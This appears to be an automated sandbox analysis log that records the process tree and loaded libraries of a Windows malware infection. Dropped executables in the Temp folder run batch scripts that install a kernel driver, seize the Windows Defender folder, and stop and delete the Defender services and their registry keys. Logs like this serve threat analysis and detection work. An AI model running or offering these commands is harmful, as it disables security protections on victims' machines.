Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2284,i,14052270885634350460,10056788384925105811,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2484 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: duser.dll Jump to behavior
